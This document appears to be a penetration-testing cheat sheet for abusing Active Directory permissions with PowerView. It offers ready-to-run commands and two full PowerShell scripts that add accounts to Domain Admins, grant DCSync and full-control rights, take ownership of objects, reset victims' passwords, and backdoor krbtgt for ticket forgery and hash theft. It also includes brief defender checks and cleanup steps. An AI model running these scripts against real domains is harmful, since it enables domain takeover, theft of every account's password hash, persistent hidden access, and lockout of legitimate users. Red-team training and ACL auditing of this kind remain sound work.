
Exploitation with Powerview

Examples. The -TargetIdentity/-PrincipalIdentity parameters shown here belong to Add-DomainObjectAcl from the PowerView dev branch (the original Add-ObjectAcl used -TargetSamAccountName and -PrincipalSamAccountName). In both versions -Rights accepts only All, ResetPassword, WriteMembers and DCSync; values such as WriteProperty, GenericAll or WriteOwner fail parameter validation, so the commands below use the supported names:

  1. Add a user to the Domain Admins group (requires GenericAll, GenericWrite or WriteMembers on the group; $Cred is a PSCredential for the account that holds that right)

     Add-DomainGroupMember -Identity 'Domain Admins' -Members 'USER' -Credential $Cred
  2. Grant the password-reset extended right on a user (User-Force-Change-Password, so the target's current password is never needed). A write on one specific attribute is not exposed through -Rights and needs a raw ACE instead.

     Add-DomainObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights ResetPassword
  3. Add GenericAll permissions (full control)

     Add-DomainObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights All
  4. Add permissions for DCSync (the Replicating Directory Changes extended rights; PowerView adds all three, and they must be set on the domain head, not on a user)

     Add-DomainObjectAcl -TargetIdentity "DC=example,DC=com" -PrincipalIdentity <attacker_username> -Rights DCSync
  5. Grant permissions on group membership (write access to the group's member attribute)

     Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity <attacker_username> -Rights WriteMembers

Once granted, you can add yourself to the group using Add-DomainGroupMember, as in example 1.

  6. Modify GPO permissions (GenericAll on the GPO object; editing the policy also needs write access to its folder under SYSVOL, which carries its own NTFS ACL). If the display name does not resolve, pass the GPO's distinguished name from Get-DomainGPO instead.

     Add-DomainObjectAcl -TargetIdentity "Default Domain Policy" -PrincipalIdentity <attacker_username> -Rights All
  7. Abuse WriteOwner permissions

If you already hold WriteOwner on an object (e.g., a user or group), you can make yourself its owner. The owner has implicit WriteDacl, so you can then grant yourself full control and escalate privileges. WriteOwner itself is not a -Rights value of Add-DomainObjectAcl: granting it to another principal requires writing a raw ACE.

     Set-DomainObjectOwner -Identity <target_username> -OwnerIdentity <attacker_username>
     Add-DomainObjectAcl -TargetIdentity <target_username> -PrincipalIdentity <attacker_username> -Rights All
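The rights that Add-DomainObjectAcl cannot grant (WriteOwner, WriteDacl, GenericWrite on a GPO) have to be written as a raw ACE through System.DirectoryServices. The script below is an added example, not code from the original page or from PowerView itself. It assumes PowerView.ps1 is dot-sourced from the current directory, that the running user already holds WriteDacl (or ownership) on the targets, and that the account names 'attacker' and 'svc_backup' and the helper Add-RawObjectAce are hypothetical; it chains the grant with the ownership takeover and full-control step described above and finishes by reading back the resulting ACEs.

```powershell
# Added example, not part of the original page. Assumes PowerView.ps1 is in the
# current directory and that the current user can already write the target DACLs.
. .\PowerView.ps1

function Add-RawObjectAce {
    # Hypothetical helper: grant any ActiveDirectoryRights value (WriteOwner,
    # WriteDacl, GenericWrite, ...) to a principal on one AD object.
    param(
        [Parameter(Mandatory)] [string] $TargetDN,
        [Parameter(Mandatory)] [string] $PrincipalSid,
        [Parameter(Mandatory)] [System.DirectoryServices.ActiveDirectoryRights] $Rights
    )
    $entry = [ADSI]"LDAP://$TargetDN"
    # Only touch the DACL; writing owner/SACL would need extra rights.
    $entry.PsBase.Options.SecurityMasks = 'Dacl'
    $sid = New-Object System.Security.Principal.SecurityIdentifier $PrincipalSid
    $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $sid,
        $Rights,
        [System.Security.AccessControl.AccessControlType]::Allow,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None)
    $entry.PsBase.ObjectSecurity.AddAccessRule($ace)
    $entry.PsBase.CommitChanges()
}

$attacker = 'attacker'      # hypothetical account controlled by the tester
$target   = 'svc_backup'    # hypothetical target user
$targetDN = (Get-DomainUser -Identity $target).distinguishedname
$sid      = (Get-DomainUser -Identity $attacker).objectsid

# Grant WriteOwner on the user (not possible via -Rights, so raw ACE).
Add-RawObjectAce -TargetDN $targetDN -PrincipalSid $sid -Rights WriteOwner

# Abuse it: become owner, then use the owner's implicit WriteDacl to take full control.
Set-DomainObjectOwner -Identity $target -OwnerIdentity $attacker
Add-DomainObjectAcl -TargetIdentity $target -PrincipalIdentity $attacker -Rights All

# GPO variant: resolve the GPO by display name and grant GenericWrite on the
# directory object. The GPO's SYSVOL folder has a separate NTFS ACL.
$gpoDN = (Get-DomainGPO -Identity 'Default Domain Policy').distinguishedname
Add-RawObjectAce -TargetDN $gpoDN -PrincipalSid $sid -Rights GenericWrite

# Read back what the attacker principal now holds on the user object.
Get-DomainObjectAcl -Identity $target -ResolveGUIDs |
    Where-Object { $_.SecurityIdentifier -eq $sid } |
    Select-Object ActiveDirectoryRights, ObjectAceType, AceType
```

The final Get-DomainObjectAcl query is the same check a defender would run against a sensitive object: any explicit ACE naming a low-privilege SID with WriteOwner, WriteDacl, GenericWrite or GenericAll is a finding regardless of how it got there.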

  8. Modify passwords for persistence and privilege escalation

With ResetPassword (example 2) or GenericAll on a user, Set-DomainUserPassword resets the account's password without knowing the current one. This is noisy: it locks the legitimate user out and leaves event 4724 (an attempt was made to reset an account's password) on the domain controller.

  9. Backdoor an object via ACLs

You can add backdoor permissions (e.g., GenericAll, granted with -Rights All) on critical objects like Domain Admins or krbtgt. GenericAll on krbtgt lets you reset its key later and forge Kerberos tickets; DCSync rights on the domain head (example 4) let you pull every account's hash. Both appear in Get-DomainObjectAcl output, so check what the compromised principal now holds before moving on.

  10. Remove permissions (cleanup)

Remove-DomainObjectAcl takes the same -TargetIdentity, -PrincipalIdentity and -Rights parameters as Add-DomainObjectAcl, so every ACE added above can be removed with the same values that created it; Remove-DomainGroupMember undoes example 1.
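The password reset, ACL backdoor, verification and cleanup steps above as one runnable script. This is an added example, not code from the original page or from PowerView; it assumes PowerView.ps1 is dot-sourced from the current directory, that the tester controls the hypothetical account 'attacker' and already holds the right each step needs, and that 'svc_backup' and the password value are made up for illustration.

```powershell
# Added example, not part of the original page. Assumes PowerView.ps1 is in the
# current directory and that the caller already holds the needed rights.
. .\PowerView.ps1

$attacker = 'attacker'      # hypothetical account controlled by the tester
$victim   = 'svc_backup'    # hypothetical target user
$domainDN = 'DC=' + ((Get-Domain).Name -replace '\.', ',DC=')

# Password reset (needs ResetPassword or GenericAll on the user). The old
# password is not required, which is what makes this a persistence primitive.
$newPass = ConvertTo-SecureString 'Hypothetical-Pass-2024!' -AsPlainText -Force
Set-DomainUserPassword -Identity $victim -AccountPassword $newPass

# ACL backdoors: full control over krbtgt (reset its key later, forge tickets)
# and DCSync on the domain head (pull every account's hash).
Add-DomainObjectAcl -TargetIdentity 'krbtgt'  -PrincipalIdentity $attacker -Rights All
Add-DomainObjectAcl -TargetIdentity $domainDN -PrincipalIdentity $attacker -Rights DCSync

# Defender's view: which ACEs on sensitive objects name the attacker SID?
$sid = (Get-DomainUser -Identity $attacker).objectsid
foreach ($obj in 'krbtgt', 'Domain Admins', $domainDN) {
    Get-DomainObjectAcl -Identity $obj -ResolveGUIDs |
        Where-Object { $_.SecurityIdentifier -eq $sid } |
        Select-Object @{ n = 'Object'; e = { $obj } }, ActiveDirectoryRights, ObjectAceType
}

# Cleanup: Remove-DomainObjectAcl mirrors Add-DomainObjectAcl, so each grant is
# undone with the same -Rights value; group membership is undone separately.
Remove-DomainObjectAcl -TargetIdentity 'krbtgt'  -PrincipalIdentity $attacker -Rights All
Remove-DomainObjectAcl -TargetIdentity $domainDN -PrincipalIdentity $attacker -Rights DCSync
Remove-DomainGroupMember -Identity 'Domain Admins' -Members $attacker
```

Run the verification loop again after the cleanup block; an empty result for the attacker SID on all three objects is the expected end state. The password reset itself cannot be undone from here, since the original password is unknown, which is why it should be the last resort on a real engagement.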
